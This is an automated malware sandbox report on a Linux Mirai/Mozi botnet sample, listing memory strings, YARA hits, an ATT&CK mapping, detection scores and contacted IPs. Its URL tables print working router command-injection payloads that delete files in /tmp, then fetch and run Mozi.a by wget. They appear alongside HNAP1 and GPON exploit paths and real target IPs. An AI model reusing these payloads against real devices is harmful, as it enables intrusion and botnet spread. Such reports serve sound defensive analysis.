Source: kvm-test-1-run.sh.30.dr	Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: echo Monitoring qemu job at yet-as-unknown pid
Source: kvm.sh.30.dr	Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh2.30.dr	Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: QEMU="`identify_qemu vmlinux`"
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$resdir/console.log"`"
Source: ZFvtIZszMd, 5268.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp	Binary or memory string: ~qemu: uncaught target signal 4 (Illegal instruction) - core dumped
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
Source: functions.sh2.30.dr	Binary or memory string: identify_qemu_args () {
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-x86_64\|qemu-system-i386)
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh2.30.dr	Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid $[0-9]$.$/\1/p" $resdir/Warnings`"
Source: ZFvtIZszMd, 5247.1.00000000fe9232f0.000000009560e333.rw-.sdmp, ZFvtIZszMd, 5249.1.00000000fe9232f0.000000009560e333.rw-.sdmp, ZFvtIZszMd, 5268.1.00000000fe9232f0.000000009560e333.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
Source: functions.sh2.30.dr	Binary or memory string: echo qemu-system-ppc64
Source: functions.sh2.30.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: functions.sh2.30.dr	Binary or memory string: echo qemu-system-aarch64
Source: kvm-recheck-rcu.sh.30.dr	Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh2.30.dr	Binary or memory string: # identify_qemu_append qemu-cmd
Source: kvm.sh.30.dr	Binary or memory string: print "needqemurun="
Source: functions.sh2.30.dr	Binary or memory string: identify_qemu_vcpus () {
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: if test $commandcompleted -eq 0 -a -n "$qemu_pid"
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: if test -z "$qemu_pid" \|\| kill -0 "$qemu_pid" > /dev/null 2>&1
Source: kvm.sh.30.dr	Binary or memory string: print "\tneedqemurun=1"
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $resdir/console.log
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_args=$5
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: # Generate qemu -append arguments
Source: ZFvtIZszMd, 5247.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp, ZFvtIZszMd, 5249.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp, ZFvtIZszMd, 5268.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: ZFvtIZszMd, 5268.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 4 (Illegal instruction) - core dumped
Source: functions.sh2.30.dr	Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.30.dr	Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: kvm.sh.30.dr	Binary or memory string: print "if test -n \"$needqemurun\""
Source: functions.sh2.30.dr	Binary or memory string: echo qemu-system-i386
Source: functions.sh2.30.dr	Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: functions.sh2.30.dr	Binary or memory string: echo qemu-system-x86_64
Source: functions.sh2.30.dr	Binary or memory string: identify_qemu () {
Source: parse-console.sh.30.dr	Binary or memory string: print_warning Console output contains nul bytes, old qemu still running?
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: sleep 10 # Give qemu's pid a chance to reach the file
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh2.30.dr	Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-aarch64)
Source: kvm.sh.30.dr	Binary or memory string: checkarg --qemu-args "(qemu arguments)" $# "$2" '^-' '^error'
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: echo Unknown PID, cannot kill qemu command
Source: kvm-recheck-lock.sh.30.dr	Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh2.30.dr	Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: functions.sh2.30.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: echo $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-x86_64\|qemu-system-i386\|qemu-system-aarch64)
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-x86_64)
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-aarch64)
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-x86_64\|qemu-system-i386)
Source: functions.sh2.30.dr	Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_pid=""
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: elif test -z "$qemu_pid"
Source: functions.sh2.30.dr	Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: ZFvtIZszMd, 5247.1.00000000fe9232f0.000000009560e333.rw-.sdmp, ZFvtIZszMd, 5249.1.00000000fe9232f0.000000009560e333.rw-.sdmp, ZFvtIZszMd, 5268.1.00000000fe9232f0.000000009560e333.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
Source: functions.sh2.30.dr	Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_MEM="$TORTURE_QEMU_MEM"; export TORTURE_QEMU_MEM
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: kvm.sh.30.dr	Binary or memory string: --qemu-args\|--qemu-arg)
Source: functions.sh2.30.dr	Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_MEM=$2
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh2.30.dr	Binary or memory string: specify_qemu_cpus () {
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-i386)
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-ppc64)
Source: functions.sh2.30.dr	Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm.sh.30.dr	Binary or memory string: print "needqemurun="
Source: functions.sh2.30.dr	Binary or memory string: # qemu-args already contains "-smp".
Source: functions.sh2.30.dr	Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh2.30.dr	Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: QEMU="`identify_qemu $base_resdir/vmlinux`"
Source: functions.sh2.30.dr	Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh2.30.dr	Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh2.30.dr	Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh2.30.dr	Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: kvm.sh.30.dr	Binary or memory string: --qemu-cmd)
Source: functions.sh2.30.dr	Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_args="-enable-kvm -nographic $qemu_args"
Source: functions.sh2.30.dr	Binary or memory string: # identify_qemu builddir
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh2.30.dr	Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: if test -s "$resdir/qemu_pid"

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: 5249.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5247.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5268.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match	File source: ZFvtIZszMd, type: SAMPLE
Source: Yara match	File source: 5249.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 5268.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 5247.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZFvtIZszMd PID: 5249, type: MEMORYSTR
Source: Yara match	File source: /usr/networks, type: DROPPED
Source: Yara match	File source: Process Memory Space: ZFvtIZszMd PID: 5247, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZFvtIZszMd PID: 5268, type: MEMORYSTR

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: 5249.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5247.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5268.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match	File source: ZFvtIZszMd, type: SAMPLE
Source: Yara match	File source: 5249.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 5268.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 5247.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZFvtIZszMd PID: 5249, type: MEMORYSTR
Source: Yara match	File source: /usr/networks, type: DROPPED
Source: Yara match	File source: Process Memory Space: ZFvtIZszMd PID: 5247, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZFvtIZszMd PID: 5268, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Command and Scripting Interpreter	1 .bash_profile and .bashrc	1 .bash_profile and .bashrc	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	12 Scripting	1 At (Linux)	1 At (Linux)	1 File and Directory Permissions Modification	1 Brute Force	1 Remote System Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 At (Linux)	Logon Script (Windows)	Logon Script (Windows)	12 Scripting	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	4 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 File Deletion	NTDS	1 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	5 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	6 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ZFvtIZszMd	67%	Virustotal		Browse
ZFvtIZszMd	49%	Metadefender		Browse
ZFvtIZszMd	60%	ReversingLabs	Linux.Trojan.Mirai

Dropped Files

Source	Detection	Scanner	Label	Link
/usr/networks	49%	Metadefender		Browse
/usr/networks	60%	ReversingLabs	Linux.Trojan.Mirai

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://pastebin.ca)	0%	Avira URL Cloud	safe
http://187.157.44.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://%s:%d/bin.sh;chmod	0%	Avira URL Cloud	safe
http://83.142.198.185:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://200.123.205.169:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.a;chmod	0%	Avira URL Cloud	safe
http://45.144.3.201:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://127.0.0.1:7574/UD/act?1	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.m;$	0%	Avira URL Cloud	safe
http://46.254.184.147:80/HNAP1/	0%	Avira URL Cloud	safe
http://23.12.89.25:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://52.72.158.238:80/HNAP1/	0%	Avira URL Cloud	safe
http://185.199.110.112:80/HNAP1/	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.m	0%	Avira URL Cloud	safe
http://www.alsa-project.org/cardinfo-db/	0%	Avira URL Cloud	safe
http://190.166.198.45:80/HNAP1/	0%	Avira URL Cloud	safe
http://54.84.181.34:80/HNAP1/	0%	Avira URL Cloud	safe
http://%s:%d/bin.sh	0%	Avira URL Cloud	safe
http://www.alsa-project.org/alsa-info.sh	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.m;	0%	Avira URL Cloud	safe
http://52.73.33.104:80/HNAP1/	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.a;sh$	0%	Avira URL Cloud	safe
http://52.4.18.169:80/HNAP1/	0%	Avira URL Cloud	safe
http://52.232.110.39:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://23.208.233.170:80/HNAP1/	0%	Avira URL Cloud	safe
http://168.176.61.231:80/HNAP1/	0%	Avira URL Cloud	safe
http://23.208.34.61:80/HNAP1/	0%	Avira URL Cloud	safe
http://210.117.103.177:49152/soap.cgi?service=WANIPConn1	0%	Avira URL Cloud	safe
http://45.8.220.39:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://127.0.0.1:80/GponForm/diag_Form?images/	0%	Avira URL Cloud	safe
http://2.178.219.63:80/HNAP1/	0%	Avira URL Cloud	safe
http://127.0.0.1:8080/GponForm/diag_Form?images/	0%	Avira URL Cloud	safe
http://127.0.0.1	0%	Avira URL Cloud	safe
http://127.0.0.1:5555/UD/act?1	0%	Avira URL Cloud	safe
http://www.alsa-project.org	0%	Avira URL Cloud	safe
http://184.25.176.127:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://127.0.0.1sendcmd	0%	URL Reputation	safe
http://%s:%d/Mozi.m;/tmp/Mozi.m	0%	Avira URL Cloud	safe
http://161.71.2.41:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://purenetworks.com/HNAP1/	0%	URL Reputation	safe
http://www.alsa-project.org.	0%	Avira URL Cloud	safe
http://64.34.159.178:80/HNAP1/	0%	Avira URL Cloud	safe
http://HTTP/1.1	0%	Avira URL Cloud	safe
http://104.101.170.129:80/HNAP1/	0%	Avira URL Cloud	safe
http://3.20.201.243:80/HNAP1/	0%	Avira URL Cloud	safe
http://207.154.230.111:80/HNAP1/	0%	Avira URL Cloud	safe
http://34.98.66.83:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dht.transmissionbt.com	87.98.162.88	true	false	high
bttracker.acc.umu.se	130.239.18.158	true	false	high
router.bittorrent.com	67.215.246.10	true	false	high
router.utorrent.com	82.221.103.244	true	false	high
bttracker.debian.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://187.157.44.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://83.142.198.185:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://200.123.205.169:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://45.144.3.201:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://127.0.0.1:7574/UD/act?1	false	Avira URL Cloud: safe	unknown
http://46.254.184.147:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://23.12.89.25:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://52.72.158.238:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://185.199.110.112:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://190.166.198.45:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://54.84.181.34:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://52.73.33.104:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://52.4.18.169:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://52.232.110.39:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://23.208.233.170:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://168.176.61.231:80/HNAP1/	false	Avira URL Cloud: safe	unknown
http://23.208.34.61:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://210.117.103.177:49152/soap.cgi?service=WANIPConn1	false	Avira URL Cloud: safe	unknown
http://45.8.220.39:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://127.0.0.1:80/GponForm/diag_Form?images/	false	Avira URL Cloud: safe	unknown
http://2.178.219.63:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://127.0.0.1:8080/GponForm/diag_Form?images/	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:5555/UD/act?1	true	Avira URL Cloud: safe	unknown
http://184.25.176.127:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://161.71.2.41:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://64.34.159.178:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://104.101.170.129:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://3.20.201.243:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://207.154.230.111:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://34.98.66.83:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://pastebin.ca)	alsa-info.sh.30.dr	false	Avira URL Cloud: safe	low
http://%s:%d/bin.sh;chmod	ZFvtIZszMd, networks.30.dr	true	Avira URL Cloud: safe	low
http://%s:%d/Mozi.a;chmod	networks.30.dr	false	Avira URL Cloud: safe	low
http://%s:%d/Mozi.m;$	ZFvtIZszMd, networks.30.dr	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/soap/envelope/	networks.30.dr	false		high
http://www.pastebin.ca/upload.php	alsa-info.sh.30.dr	false		high
http://%s:%d/Mozi.m	networks.30.dr	false	Avira URL Cloud: safe	low
http://www.alsa-project.org/cardinfo-db/	alsa-info.sh.30.dr	false	Avira URL Cloud: safe	unknown
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY	alsa-info.sh.30.dr	false		high
http://%s:%d/bin.sh	networks.30.dr	true	Avira URL Cloud: safe	low
http://www.alsa-project.org/alsa-info.sh	alsa-info.sh.30.dr	false	Avira URL Cloud: safe	unknown
http://%s:%d/Mozi.m;	ZFvtIZszMd, networks.30.dr	false	Avira URL Cloud: safe	low
http://%s:%d/Mozi.a;sh$	ZFvtIZszMd, networks.30.dr	false	Avira URL Cloud: safe	low
http://www.pastebin.ca.	alsa-info.sh.30.dr	false		high
http://schemas.xmlsoap.org/soap/encoding/	networks.30.dr	false		high
http://127.0.0.1	networks.30.dr	false	Avira URL Cloud: safe	unknown
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)	ZFvtIZszMd, networks.30.dr	false		high
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/	.config.30.dr	false		high
http://www.alsa-project.org	alsa-info.sh.30.dr	false	Avira URL Cloud: safe	unknown
http://127.0.0.1sendcmd	ZFvtIZszMd, networks.30.dr	false	URL Reputation: safe	low
https://ubuntu.com/blog/microk8s-memory-optimisation	motd-news.18.dr	false		high
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah	alsa-info.sh.30.dr	false		high
http://ipinfo.io/ip	networks.30.dr	false		high
http://%s:%d/Mozi.m;/tmp/Mozi.m	ZFvtIZszMd, networks.30.dr	false	Avira URL Cloud: safe	low
http://www.pastebin.ca	alsa-info.sh.30.dr	false		high
http://purenetworks.com/HNAP1/	ZFvtIZszMd, networks.30.dr	false	URL Reputation: safe	unknown
http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e	kmod.sh.30.dr	false		high
http://www.alsa-project.org.	alsa-info.sh.30.dr	false	Avira URL Cloud: safe	unknown
http://HTTP/1.1	ZFvtIZszMd, networks.30.dr	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/soap/envelope//	ZFvtIZszMd, networks.30.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
167.13.252.185	unknown	United States	3816	COLOMBIATELECOMUNICACIONESSAESPCO	false
134.109.132.112	unknown	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false
135.242.188.8	unknown	United States	10455	LUCENT-CIOUS	false
177.73.251.61	unknown	Brazil	262558	PROMPTBRASILSOLUCOESEMTILTDABR	false
118.185.13.53	unknown	India	55410	VIL-AS-APVodafoneIdeaLtdIN	false
86.199.245.5	unknown	France	3215	FranceTelecom-OrangeFR	false
2.51.74.234	unknown	United Arab Emirates	5384	EMIRATES-INTERNETEmiratesInternetAE	false
88.225.4.102	unknown	Turkey	9121	TTNETTR	false
213.243.254.10	unknown	Italy	29050	TERRECABLATETerrecablateRetieServiziSrlIT	false
105.214.241.254	unknown	South Africa	16637	MTNNS-ASZA	false
82.40.120.62	unknown	United Kingdom	5089	NTLGB	false
200.55.162.24	unknown	Cuba	27725	EmpresadeTelecomunicacionesdeCubaSACU	false
97.54.207.224	unknown	United States	22394	CELLCOUS	false
26.56.43.205	unknown	United States	7922	COMCAST-7922US	false
91.212.82.117	unknown	unknown	48964	ENTERRA-ASUA	false
194.218.177.186	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	false
157.207.132.147	unknown	United States	53926	APA-US-ASNUS	false
204.45.126.208	unknown	United States	174	COGENT-174US	false
7.193.28.254	unknown	United States	3356	LEVEL3US	false
83.25.227.199	unknown	Poland	5617	TPNETPL	false
84.71.242.96	unknown	United Kingdom	5378	VodafoneGB	false
185.18.207.206	unknown	Israel	61102	INTERHOSTIL	false
89.94.62.166	unknown	France	5410	BOUYGTEL-ISPFR	false
195.61.161.173	unknown	European Union	51964	ORANGE-BUSINESS-SERVICES-IPSN-ASNFR	false
142.81.176.61	unknown	Canada	5769	VIDEOTRONCA	false
3.65.136.88	unknown	United States	16509	AMAZON-02US	false
94.140.191.157	unknown	Belgium	48517	DESTINY-BACKBONEInternationalBackboneBE	false
181.33.35.31	unknown	Colombia	3816	COLOMBIATELECOMUNICACIONESSAESPCO	false
207.76.206.157	unknown	United States	701	UUNETUS	false
208.140.180.142	unknown	United States	3561	CENTURYLINK-LEGACY-SAVVISUS	false
133.116.187.207	unknown	Japan	2522	PPP-EXPJapanNetworkInformationCenterJP	false
129.19.234.207	unknown	United States	54393	FLC-DURANGOUS	false
121.93.165.47	unknown	Japan	2510	INFOWEBFUJITSULIMITEDJP	false
160.108.162.20	unknown	United States	715	WOODYNET-2US	false
88.60.130.88	unknown	Italy	3269	ASN-IBSNAZIT	false
140.92.187.172	unknown	Taiwan; Republic of China (ROC)	1659	ERX-TANET-ASN1TaiwanAcademicNetworkTANetInformationC	false
17.195.182.102	unknown	United States	714	APPLE-ENGINEERINGUS	false
130.175.68.192	unknown	United States	12173	UAUS	false
20.57.184.167	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.238.47.38	unknown	United States	16509	AMAZON-02US	true
166.178.154.91	unknown	United States	20057	ATT-MOBILITY-LLC-AS20057US	false
40.111.74.139	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
51.67.184.58	unknown	United Kingdom	2686	ATGS-MMD-ASUS	false
